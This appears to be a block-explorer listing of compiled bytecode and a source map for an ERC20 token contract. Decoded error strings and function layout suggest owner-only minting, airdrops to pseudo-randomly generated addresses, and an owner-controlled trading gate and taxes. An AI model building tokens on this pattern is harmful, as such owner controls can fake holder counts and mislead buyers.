082015250565b5f612591602883611f8b565b915061259c82612537565b604082019050919050565b5f6020820190508181035f8301526125be81612585565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f6125fc8261207c565b91506126078361207c565b925082820190508082111561261f5761261e6125c5565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f612659602083611f8b565b915061266482612625565b602082019050919050565b5f6020820190508181035f8301526126868161264d565b9050919050565b7f41697264726f7074696d6573206d7573742062652067726561746572207468615f8201527f6e207a65726f0000000000000000000000000000000000000000000000000000602082015250565b5f6126e7602683611f8b565b91506126f28261268d565b604082019050919050565b5f6020820190508181035f830152612714816126db565b9050919050565b7f6e756d416464726573736573206d7573742062652067726561746572207468615f8201527f6e207a65726f0000000000000000000000000000000000000000000000000000602082015250565b5f612775602683611f8b565b91506127808261271b565b604082019050919050565b5f6020820190508181035f8301526127a281612769565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f6127e08261207c565b91506127eb8361207c565b9250826127fb576127fa6127a9565b5b828206905092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f8160011c9050919050565b5f808291508390505b600185111561288857808604811115612864576128636125c5565b5b60018516156128735780820291505b808102905061288185612833565b9450612848565b94509492505050565b5f826128a0576001905061295b565b816128ad575f905061295b565b81600181146128c357600281146128cd576128fc565b600191505061295b565b60ff8411156128df576128de6125c5565b5b8360020a9150848211156128f6576128f56125c5565b5b5061295b565b5060208310610133831016604e8410600b84101617156129315782820a90508381111561292c5761292b6125c5565b5b61295b565b61293e848484600161283f565b92509050818404811115612955576129546125c5565b5b81810290505b9392505050565b5f61296c8261207c565b9150612977836121c0565b92506129a47fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484612891565b905092915050565b5f6129b68261207c565b91506129c18361207c565b92508282026129cf8161207c565b915082820484148315176129e6576129e56125c5565b5b5092915050565b7f544553543a2054686520556e69737761702056322070616972206164647265735f8201527f732063616e6e6f7420626520746865207a65726f20616464726573732e000000602082015250565b5f612a47603d83611f8b565b9150612a52826129ed565b604082019050919050565b5f6020820190508181035f830152612a7481612a3b565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f612ad5602583611f8b565b9150612ae082612a7b565b604082019050919050565b5f6020820190508181035f830152612b0281612ac9565b9050919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302612b657fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82612b2a565b612b6f8683612b2a565b95508019841693508086168417925050509392505050565b5f819050919050565b5f612baa612ba5612ba08461207c565b612b87565b61207c565b9050919050565b5f819050919050565b612bc383612b90565b612bd7612bcf82612bb1565b848454612b36565b825550505050565b5f90565b612beb612bdf565b612bf6818484612bba565b505050565b5b81811015612c1957612c0e5f82612be3565b600181019050612bfc565b5050565b601f821115612c5e57612c2f81612b09565b612c3884612b1b565b81016020851015612c47578190505b612c5b612c5385612b1b565b830182612bfb565b50505b505050565b5f82821c905092915050565b5f612c7e5f1984600802612c63565b1980831691505092915050565b5f612c968383612c6f565b9150826002028217905092915050565b612caf82611f81565b67ffffffffffffffff811115612cc857612cc7612302565b5b612cd28254612507565b612cdd828285612c1d565b5f60209050601f831160018114612d0e575f8415612cfc578287015190505b612d068582612c8b565b865550612d6d565b601f198416612d1c86612b09565b5f5b82811015612d4357848901518255600182019150602085019450602081019050612d1e565b86831015612d605784890151612d5c601f891682612c6f565b8355505b6001600288020188555050505b505050505050565b7f496e76616c696420726563697069656e742061646472657373000000000000005f82015250565b5f612da9601983611f8b565b9150612db482612d75565b602082019050919050565b5f6020820190508181035f830152612dd681612d9d565b9050919050565b7f416d6f756e74206d7573742062652067726561746572207468616e207a65726f5f82015250565b5f612e11602083611f8b565b9150612e1c82612ddd565b602082019050919050565b5f6020820190508181035f830152612e3e81612e05565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f612e9f602683611f8b565b9150612eaa82612e45565b604082019050919050565b5f6020820190508181035f830152612ecc81612e93565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f612f2d602483611f8b565b9150612f3882612ed3565b604082019050919050565b5f6020820190508181035f830152612f5a81612f21565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f612fbb602283611f8b565b9150612fc682612f61565b604082019050919050565b5f6020820190508181035f830152612fe881612faf565b9050919050565b7f436f6e74726163743a207472616465206973206e6f74206f70656e21000000005f82015250565b5f613023601c83611f8b565b915061302e82612fef565b602082019050919050565b5f6020820190508181035f83015261305081613017565b9050919050565b7f436f6e74726163743a2074726164696e67206973206e6f7420737461727465645f82015250565b5f61308b602083611f8b565b915061309682613057565b602082019050919050565b5f6020820190508181035f8301526130b88161307f565b9050919050565b5f6130c98261207c565b91506130d48361207c565b9250826130e4576130e36127a9565b5b828204905092915050565b5f6130f98261207c565b91506131048361207c565b925082820390508181111561311c5761311b6125c5565b5b92915050565b5f819050919050565b61313c6131378261207c565b613122565b82525050565b5f61314d828661312b565b60208201915061315d828561312b565b60208201915061316d828461312b565b602082019150819050949350505050565b5f6131888261207c565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036131ba576131b96125c5565b5b600182019050919050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f6131f9601f83611f8b565b9150613204826131c5565b602082019050919050565b5f6020820190508181035f830152613226816131ed565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f613287602583611f8b565b91506132928261322d565b604082019050919050565b5f6020820190508181035f8301526132b48161327b565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f613315602383611f8b565b9150613320826132bb565b604082019050919050565b5f6020820190508181035f83015261334281613309565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f6133a3602683611f8b565b91506133ae82613349565b604082019050919050565b5f6020820190508181035f8301526133d081613397565b905091905056fea2646970667358221220486cb9437faf8956f94c9690f5bb5b3eaa8645ef1c5ffb95a09d42e9a0e96be564736f6c63430008190033
Deployed Bytecode Sourcemap
21897:5198:1:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10923:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13156:194;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22121:31;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12043:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22398:31;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13832:529;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22195:71;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22317:36;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11885:93;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14770:290;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22275:35;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22159:29;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22069:43;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23945:128;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;22360:31;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12214:143;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;24393:787;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;4217:103;;;:::i;:::-;;23387:222;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;3530:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11142:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22021:40;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15563:475;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12570:200;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23770:167;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;23617:145;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;21939:75;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12833:176;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;24083:299;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;4475:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;10923:100;10977:13;11010:5;11003:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10923:100;:::o;13156:194::-;13264:4;13281:39;13290:12;:10;:12::i;:::-;13304:7;13313:6;13281:8;:39::i;:::-;13338:4;13331:11;;13156:194;;;;:::o;22121:31::-;;;;;;;;;;;;;:::o;12043:108::-;12104:7;12131:12;;12124:19;;12043:108;:::o;22398:31::-;;;;:::o;13832:529::-;13972:4;13989:36;13999:6;14007:9;14018:6;13989:9;:36::i;:::-;14038:24;14065:11;:19;14077:6;14065:19;;;;;;;;;;;;;;;:33;14085:12;:10;:12::i;:::-;14065:33;;;;;;;;;;;;;;;;14038:60;;14151:6;14131:16;:26;;14109:116;;;;;;;;;;;;:::i;:::-;;;;;;;;;14261:57;14270:6;14278:12;:10;:12::i;:::-;14311:6;14292:16;:25;14261:8;:57::i;:::-;14349:4;14342:11;;;13832:529;;;;;:::o;22195:71::-;;;;;;;;;;;;;:::o;22317:36::-;;;:::o;11885:93::-;11943:5;11968:2;11961:9;;11885:93;:::o;14770:290::-;14883:4;14900:130;14923:12;:10;:12::i;:::-;14950:7;15009:10;14972:11;:25;14984:12;:10;:12::i;:::-;14972:25;;;;;;;;;;;;;;;:34;14998:7;14972:34;;;;;;;;;;;;;;;;:47;;;;:::i;:::-;14900:8;:130::i;:::-;15048:4;15041:11;;14770:290;;;;:::o;22275:35::-;;;:::o;22159:29::-;;;;;;;;;;;;;:::o;22069:43::-;22109:3;22069:43;:::o;23945:128::-;3774:12;:10;:12::i;:::-;3764:22;;:6;;;;;;;;;;:22;;;3742:104;;;;;;;;;;;;:::i;:::-;;;;;;;;;24055:10:::1;24030:12;:22;24043:8;24030:22;;;;;;;;;;;;;;;;:35;;;;;;;;;;;;;;;;;;23945:128:::0;;:::o;22360:31::-;;;;:::o;12214:143::-;12304:7;12331:9;:18;12341:7;12331:18;;;;;;;;;;;;;;;;12324:25;;12214:143;;;:::o;24393:787::-;3774:12;:10;:12::i;:::-;3764:22;;:6;;;;;;;;;;:22;;;3742:104;;;;;;;;;;;;:::i;:::-;;;;;;;;;24507:1:::1;24492:12;:16;24484:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;24585:1;24570:12;:16;24562:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;24642:17;24662:15;24642:35;;24723:26;24752:31;24759:9;24770:12;24752:6;:31::i;:::-;24723:60;;24801:9;24796:377;24820:9;:16;24816:1;:20;24796:377;;;24863:9;24858:304;24882:12;24878:1;:16;24858:304;;;24993:18;25052:7;25042;25014:25;25029:9;25025:1;25021;:5;;;;:::i;:::-;:17;;;;:::i;:::-;25014:6;:25::i;:::-;:35;;;;:::i;:::-;:45;;;;:::i;:::-;24993:66;;25078:68;25088:10;25100:9;25110:1;25100:12;;;;;;;;:::i;:::-;;;;;;;;25134:10;:8;:10::i;:::-;25128:2;:16;;;;:::i;:::-;25114:10;:31;;;;:::i;:::-;25078:9;:68::i;:::-;24901:261;24896:3;;;;;;;24858:304;;;;24838:3;;;;;;;24796:377;;;;24473:707;;24393:787:::0;;:::o;4217:103::-;3774:12;:10;:12::i;:::-;3764:22;;:6;;;;;;;;;;:22;;;3742:104;;;;;;;;;;;;:::i;:::-;;;;;;;;;4282:30:::1;4309:1;4282:18;:30::i;:::-;4217:103::o:0;23387:222::-;3774:12;:10;:12::i;:::-;3764:22;;:6;;;;;;;;;;:22;;;3742:104;;;;;;;;;;;;:::i;:::-;;;;;;;;;23492:1:::1;23466:28;;:14;:28;;::::0;23458:102:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;23587:14;23571:13;;:30;;;;;;;;;;;;;;;;;;23387:222:::0;:::o;3530:87::-;3576:7;3603:6;;;;;;;;;;;3596:13;;3530:87;:::o;11142:104::-;11198:13;11231:7;11224:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;11142:104;:::o;22021:40::-;22058:3;22021:40;:::o;15563:475::-;15681:4;15698:24;15725:11;:25;15737:12;:10;:12::i;:::-;15725:25;;;;;;;;;;;;;;;:34;15751:7;15725:34;;;;;;;;;;;;;;;;15698:61;;15812:15;15792:16;:35;;15770:122;;;;;;;;;;;;:::i;:::-;;;;;;;;;15928:67;15937:12;:10;:12::i;:::-;15951:7;15979:15;15960:16;:34;15928:8;:67::i;:::-;16026:4;16019:11;;;15563:475;;;;:::o;12570:200::-;12681:4;12698:42;12708:12;:10;:12::i;:::-;12722:9;12733:6;12698:9;:42::i;:::-;12758:4;12751:11;;12570:200;;;;:::o;23770:167::-;3774:12;:10;:12::i;:::-;3764:22;;:6;;;;;;;;;;:22;;;3742:104;;;;;;;;;;;;:::i;:::-;;;;;;;;;23877:13:::1;23862:12;:28;;;;23916:13;23901:12;:28;;;;23770:167:::0;;:::o;23617:145::-;3774:12;:10;:12::i;:::-;3764:22;;:6;;;;;;;;;;:22;;;3742:104;;;;;;;;;;;;:::i;:::-;;;;;;;;;23719:6:::1;23711:5;:14;;;;;;:::i;:::-;;23746:8;23736:7;:18;;;;;;:::i;:::-;;23617:145:::0;;:::o;21939:75::-;;;:::o;12833:176::-;12947:7;12974:11;:18;12986:5;12974:18;;;;;;;;;;;;;;;:27;12993:7;12974:27;;;;;;;;;;;;;;;;12967:34;;12833:176;;;;:::o;24083:299::-;3774:12;:10;:12::i;:::-;3764:22;;:6;;;;;;;;;;:22;;;3742:104;;;;;;;;;;;;:::i;:::-;;;;;;;;;24188:1:::1;24167:23;;:9;:23;;::::0;24159:61:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;24244:1;24235:6;:10;24227:55;;;;;;;;;;;;:::i;:::-;;;;;;;;;24291:20;24330:10;:8;:10::i;:::-;24324:2;:16;;;;:::i;:::-;24314:6;:27;;;;:::i;:::-;24291:50;;24348:30;24354:9;24365:12;24348:5;:30::i;:::-;24152:230;24083:299:::0;;:::o;4475:238::-;3774:12;:10;:12::i;:::-;3764:22;;:6;;;;;;;;;;:22;;;3742:104;;;;;;;;;;;;:::i;:::-;;;;;;;;;4598:1:::1;4578:22;;:8;:22;;::::0;4556:110:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;4677:28;4696:8;4677:18;:28::i;:::-;4475:238:::0;:::o;2227:98::-;2280:7;2307:10;2300:17;;2227:98;:::o;19346:380::-;19499:1;19482:19;;:5;:19;;;19474:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;19580:1;19561:21;;:7;:21;;;19553:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;19664:6;19634:11;:18;19646:5;19634:18;;;;;;;;;;;;;;;:27;19653:7;19634:27;;;;;;;;;;;;;;;:36;;;;19702:7;19686:32;;19695:5;19686:32;;;19711:6;19686:32;;;;;;:::i;:::-;;;;;;;;19346:380;;;:::o;25825:1267::-;25993:4;25978:19;;:11;;;;;;;;;;;:19;;;25956:97;;;;;;;;;;;;:::i;:::-;;;;;;;;;26095:1;26070:27;;:13;;;;;;;;;;;:27;;;:50;;;;;26116:4;26101:19;;:11;;;;;;;;;;;:19;;;26070:50;26066:209;;;26171:7;:5;:7::i;:::-;26163:15;;:4;:15;;;:32;;;;26188:7;:5;:7::i;:::-;26182:13;;:2;:13;;;26163:32;26137:126;;;;;;;;;;;;:::i;:::-;;;;;;;;;26066:209;26287:23;26313:6;26287:32;;26359:1;26334:27;;:13;;;;;;;;;;;:27;;;;:46;;;;;26373:7;:5;:7::i;:::-;26365:15;;:4;:15;;;;26334:46;:63;;;;;26390:7;:5;:7::i;:::-;26384:13;;:2;:13;;;;26334:63;26330:700;;;26414:12;26457:13;;;;;;;;;;;26449:21;;:4;:21;;;26445:327;;26498:12;;26491:19;;26445:327;;;26555:13;;;;;;;;;;;26549:19;;:2;:19;;;26545:227;;26615:4;26593:26;;:12;:18;26606:4;26593:18;;;;;;;;;;;;;;;;;;;;;;;;;:26;;;26589:168;;26651:1;26644:8;;26589:168;;;26725:12;;26718:19;;26589:168;26545:227;26445:327;26797:1;26790:4;:8;26786:233;;;26819:22;22109:3;26844:30;;26853:4;26844:6;:13;;;;:::i;:::-;:30;;;;:::i;:::-;26819:55;;26920:14;26911:6;:23;;;;:::i;:::-;26893:41;;26953:50;26969:4;26975:11;;;;;;;;;;;26988:14;26953:15;:50::i;:::-;26800:219;26786:233;26399:631;26330:700;27042:42;27058:4;27064:2;27068:15;27042;:42::i;:::-;25945:1147;25825:1267;;;:::o;25391:424::-;25471:16;25500:26;25543:12;25529:27;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;25500:56;;25567:13;25602:9;25597:182;25621:12;25617:1;:16;25597:182;;;25721:9;25732:1;25735:5;25704:37;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;25694:48;;;;;;25686:57;;25655:9;25665:1;25655:12;;;;;;;;:::i;:::-;;;;;;;:90;;;;;;;;;;;25760:7;;;;;:::i;:::-;;;;25635:3;;;;;;;25597:182;;;;25798:9;25791:16;;;;25391:424;;;;:::o;25230:156::-;25282:7;25340:16;25358:15;25375:4;25323:57;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;25313:68;;;;;;25305:77;;25298:84;;25230:156;;;:::o;4873:191::-;4947:16;4966:6;;;;;;;;;;;4947:25;;4992:8;4983:6;;:17;;;;;;;;;;;;;;;;;;5047:8;5016:40;;5037:8;5016:40;;;;;;;;;;;;4936:128;4873:191;:::o;17585:399::-;17688:1;17669:21;;:7;:21;;;17661:65;;;;;;;;;;;;:::i;:::-;;;;;;;;;17739:49;17768:1;17772:7;17781:6;17739:20;:49::i;:::-;17817:6;17801:12;;:22;;;;;;;:::i;:::-;;;;;;;;17856:6;17834:9;:18;17844:7;17834:18;;;;;;;;;;;;;;;;:28;;;;;;;:::i;:::-;;;;;;;;17899:7;17878:37;;17895:1;17878:37;;;17908:6;17878:37;;;;;;:::i;:::-;;;;;;;;17928:48;17956:1;17960:7;17969:6;17928:19;:48::i;:::-;17585:399;;:::o;16528:770::-;16686:1;16668:20;;:6;:20;;;16660:70;;;;;;;;;;;;:::i;:::-;;;;;;;;;16770:1;16749:23;;:9;:23;;;16741:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;16825:47;16846:6;16854:9;16865:6;16825:20;:47::i;:::-;16885:21;16909:9;:17;16919:6;16909:17;;;;;;;;;;;;;;;;16885:41;;16976:6;16959:13;:23;;16937:111;;;;;;;;;;;;:::i;:::-;;;;;;;;;17120:6;17104:13;:22;17084:9;:17;17094:6;17084:17;;;;;;;;;;;;;;;:42;;;;17172:6;17148:9;:20;17158:9;17148:20;;;;;;;;;;;;;;;;:30;;;;;;;:::i;:::-;;;;;;;;17213:9;17196:35;;17205:6;17196:35;;;17224:6;17196:35;;;;;;:::i;:::-;;;;;;;;17244:46;17264:6;17272:9;17283:6;17244:19;:46::i;:::-;16649:649;16528:770;;;:::o;20326:125::-;;;;:::o;21055:124::-;;;;:::o;7:99:6:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:139::-;376:6;371:3;366;360:23;417:1;408:6;403:3;399:16;392:27;287:139;;;:::o;432:102::-;473:6;524:2;520:7;515:2;508:5;504:14;500:28;490:38;;432:102;;;:::o;540:377::-;628:3;656:39;689:5;656:39;:::i;:::-;711:71;775:6;770:3;711:71;:::i;:::-;704:78;;791:65;849:6;844:3;837:4;830:5;826:16;791:65;:::i;:::-;881:29;903:6;881:29;:::i;:::-;876:3;872:39;865:46;;632:285;540:377;;;;:::o;923:313::-;1036:4;1074:2;1063:9;1059:18;1051:26;;1123:9;1117:4;1113:20;1109:1;1098:9;1094:17;1087:47;1151:78;1224:4;1215:6;1151:78;:::i;:::-;1143:86;;923:313;;;;:::o;1242:75::-;1275:6;1308:2;1302:9;1292:19;;1242:75;:::o;1323:117::-;1432:1;1429;1422:12;1446:117;1555:1;1552;1545:12;1569:126;1606:7;1646:42;1639:5;1635:54;1624:65;;1569:126;;;:::o;1701:96::-;1738:7;1767:24;1785:5;1767:24;:::i;:::-;1756:35;;1701:96;;;:::o;1803:122::-;1876:24;1894:5;1876:24;:::i;:::-;1869:5;1866:35;1856:63;;1915:1;1912;1905:12;1856:63;1803:122;:::o;1931:139::-;1977:5;2015:6;2002:20;1993:29;;2031:33;2058:5;2031:33;:::i;:::-;1931:139;;;;:::o;2076:77::-;2113:7;2142:5;2131:16;;2076:77;;;:::o;2159:122::-;2232:24;2250:5;2232:24;:::i;:::-;2225:5;2222:35;2212:63;;2271:1;2268;2261:12;2212:63;2159:122;:::o;2287:139::-;2333:5;2371:6;2358:20;2349:29;;2387:33;2414:5;2387:33;:::i;:::-;2287:139;;;;:::o;2432:474::-;2500:6;2508;2557:2;2545:9;2536:7;2532:23;2528:32;2525:119;;;2563:79;;:::i;:::-;2525:119;2683:1;2708:53;2753:7;2744:6;2733:9;2729:22;2708:53;:::i;:::-;2698:63;;2654:117;2810:2;2836:53;2881:7;2872:6;2861:9;2857:22;2836:53;:::i;:::-;2826:63;;2781:118;2432:474;;;;;:::o;2912:90::-;2946:7;2989:5;2982:13;2975:21;2964:32;;2912:90;;;:::o;3008:109::-;3089:21;3104:5;3089:21;:::i;:::-;3084:3;3077:34;3008:109;;:::o;3123:210::-;3210:4;3248:2;3237:9;3233:18;3225:26;;3261:65;3323:1;3312:9;3308:17;3299:6;3261:65;:::i;:::-;3123:210;;;;:::o;3339:118::-;3426:24;3444:5;3426:24;:::i;:::-;3421:3;3414:37;3339:118;;:::o;3463:222::-;3556:4;3594:2;3583:9;3579:18;3571:26;;3607:71;3675:1;3664:9;3660:17;3651:6;3607:71;:::i;:::-;3463:222;;;;:::o;3691:619::-;3768:6;3776;3784;3833:2;3821:9;3812:7;3808:23;3804:32;3801:119;;;3839:79;;:::i;:::-;3801:119;3959:1;3984:53;4029:7;4020:6;4009:9;4005:22;3984:53;:::i;:::-;3974:63;;3930:117;4086:2;4112:53;4157:7;4148:6;4137:9;4133:22;4112:53;:::i;:::-;4102:63;;4057:118;4214:2;4240:53;4285:7;4276:6;4265:9;4261:22;4240:53;:::i;:::-;4230:63;;4185:118;3691:619;;;;;:::o;4316:118::-;4403:24;4421:5;4403:24;:::i;:::-;4398:3;4391:37;4316:118;;:::o;4440:222::-;4533:4;4571:2;4560:9;4556:18;4548:26;;4584:71;4652:1;4641:9;4637:17;4628:6;4584:71;:::i;:::-;4440:222;;;;:::o;4668:86::-;4703:7;4743:4;4736:5;4732:16;4721:27;;4668:86;;;:::o;4760:112::-;4843:22;4859:5;4843:22;:::i;:::-;4838:3;4831:35;4760:112;;:::o;4878:214::-;4967:4;5005:2;4994:9;4990:18;4982:26;;5018:67;5082:1;5071:9;5067:17;5058:6;5018:67;:::i;:::-;4878:214;;;;:::o;5098:89::-;5134:7;5174:6;5167:5;5163:18;5152:29;;5098:89;;;:::o;5193:115::-;5278:23;5295:5;5278:23;:::i;:::-;5273:3;5266:36;5193:115;;:::o;5314:218::-;5405:4;5443:2;5432:9;5428:18;5420:26;;5456:69;5522:1;5511:9;5507:17;5498:6;5456:69;:::i;:::-;5314:218;;;;:::o;5538:116::-;5608:21;5623:5;5608:21;:::i;:::-;5601:5;5598:32;5588:60;;5644:1;5641;5634:12;5588:60;5538:116;:::o;5660:133::-;5703:5;5741:6;5728:20;5719:29;;5757:30;5781:5;5757:30;:::i;:::-;5660:133;;;;:::o;5799:468::-;5864:6;5872;5921:2;5909:9;5900:7;5896:23;5892:32;5889:119;;;5927:79;;:::i;:::-;5889:119;6047:1;6072:53;6117:7;6108:6;6097:9;6093:22;6072:53;:::i;:::-;6062:63;;6018:117;6174:2;6200:50;6242:7;6233:6;6222:9;6218:22;6200:50;:::i;:::-;6190:60;;6145:115;5799:468;;;;;:::o;6273:329::-;6332:6;6381:2;6369:9;6360:7;6356:23;6352:32;6349:119;;;6387:79;;:::i;:::-;6349:119;6507:1;6532:53;6577:7;6568:6;6557:9;6553:22;6532:53;:::i;:::-;6522:63;;6478:117;6273:329;;;;:::o;6608:474::-;6676:6;6684;6733:2;6721:9;6712:7;6708:23;6704:32;6701:119;;;6739:79;;:::i;:::-;6701:119;6859:1;6884:53;6929:7;6920:6;6909:9;6905:22;6884:53;:::i;:::-;6874:63;;6830:117;6986:2;7012:53;7057:7;7048:6;7037:9;7033:22;7012:53;:::i;:::-;7002:63;;6957:118;6608:474;;;;;:::o;7088:117::-;7197:1;7194;7187:12;7211:117;7320:1;7317;7310:12;7334:180;7382:77;7379:1;7372:88;7479:4;7476:1;7469:15;7503:4;7500:1;7493:15;7520:281;7603:27;7625:4;7603:27;:::i;:::-;7595:6;7591:40;7733:6;7721:10;7718:22;7697:18;7685:10;7682:34;7679:62;7676:88;;;7744:18;;:::i;:::-;7676:88;7784:10;7780:2;7773:22;7563:238;7520:281;;:::o;7807:129::-;7841:6;7868:20;;:::i;:::-;7858:30;;7897:33;7925:4;7917:6;7897:33;:::i;:::-;7807:129;;;:::o;7942:308::-;8004:4;8094:18;8086:6;8083:30;8080:56;;;8116:18;;:::i;:::-;8080:56;8154:29;8176:6;8154:29;:::i;:::-;8146:37;;8238:4;8232;8228:15;8220:23;;7942:308;;;:::o;8256:148::-;8354:6;8349:3;8344;8331:30;8395:1;8386:6;8381:3;8377:16;8370:27;8256:148;;;:::o;8410:425::-;8488:5;8513:66;8529:49;8571:6;8529:49;:::i;:::-;8513:66;:::i;:::-;8504:75;;8602:6;8595:5;8588:21;8640:4;8633:5;8629:16;8678:3;8669:6;8664:3;8660:16;8657:25;8654:112;;;8685:79;;:::i;:::-;8654:112;8775:54;8822:6;8817:3;8812;8775:54;:::i;:::-;8494:341;8410:425;;;;;:::o;8855:340::-;8911:5;8960:3;8953:4;8945:6;8941:17;8937:27;8927:122;;8968:79;;:::i;:::-;8927:122;9085:6;9072:20;9110:79;9185:3;9177:6;9170:4;9162:6;9158:17;9110:79;:::i;:::-;9101:88;;8917:278;8855:340;;;;:::o;9201:834::-;9289:6;9297;9346:2;9334:9;9325:7;9321:23;9317:32;9314:119;;;9352:79;;:::i;:::-;9314:119;9500:1;9489:9;9485:17;9472:31;9530:18;9522:6;9519:30;9516:117;;;9552:79;;:::i;:::-;9516:117;9657:63;9712:7;9703:6;9692:9;9688:22;9657:63;:::i;:::-;9647:73;;9443:287;9797:2;9786:9;9782:18;9769:32;9828:18;9820:6;9817:30;9814:117;;;9850:79;;:::i;:::-;9814:117;9955:63;10010:7;10001:6;9990:9;9986:22;9955:63;:::i;:::-;9945:73;;9740:288;9201:834;;;;;:::o;10041:474::-;10109:6;10117;10166:2;10154:9;10145:7;10141:23;10137:32;10134:119;;;10172:79;;:::i;:::-;10134:119;10292:1;10317:53;10362:7;10353:6;10342:9;10338:22;10317:53;:::i;:::-;10307:63;;10263:117;10419:2;10445:53;10490:7;10481:6;10470:9;10466:22;10445:53;:::i;:::-;10435:63;;10390:118;10041:474;;;;;:::o;10521:180::-;10569:77;10566:1;10559:88;10666:4;10663:1;10656:15;10690:4;10687:1;10680:15;10707:320;10751:6;10788:1;10782:4;10778:12;10768:22;;10835:1;10829:4;10825:12;10856:18;10846:81;;10912:4;10904:6;10900:17;10890:27;;10846:81;10974:2;10966:6;10963:14;10943:18;10940:38;10937:84;;10993:18;;:::i;:::-;10937:84;10758:269;10707:320;;;:::o;11033:227::-;11173:34;11169:1;11161:6;11157:14;11150:58;11242:10;11237:2;11229:6;11225:15;11218:35;11033:227;:::o;11266:366::-;11408:3;11429:67;11493:2;11488:3;11429:67;:::i;:::-;11422:74;;11505:93;11594:3;11505:93;:::i;:::-;11623:2;11618:3;11614:12;11607:19;;11266:366;;;:::o;11638:419::-;11804:4;11842:2;11831:9;11827:18;11819:26;;11891:9;11885:4;11881:20;11877:1;11866:9;11862:17;11855:47;11919:131;12045:4;11919:131;:::i;:::-;11911:139;;11638:419;;;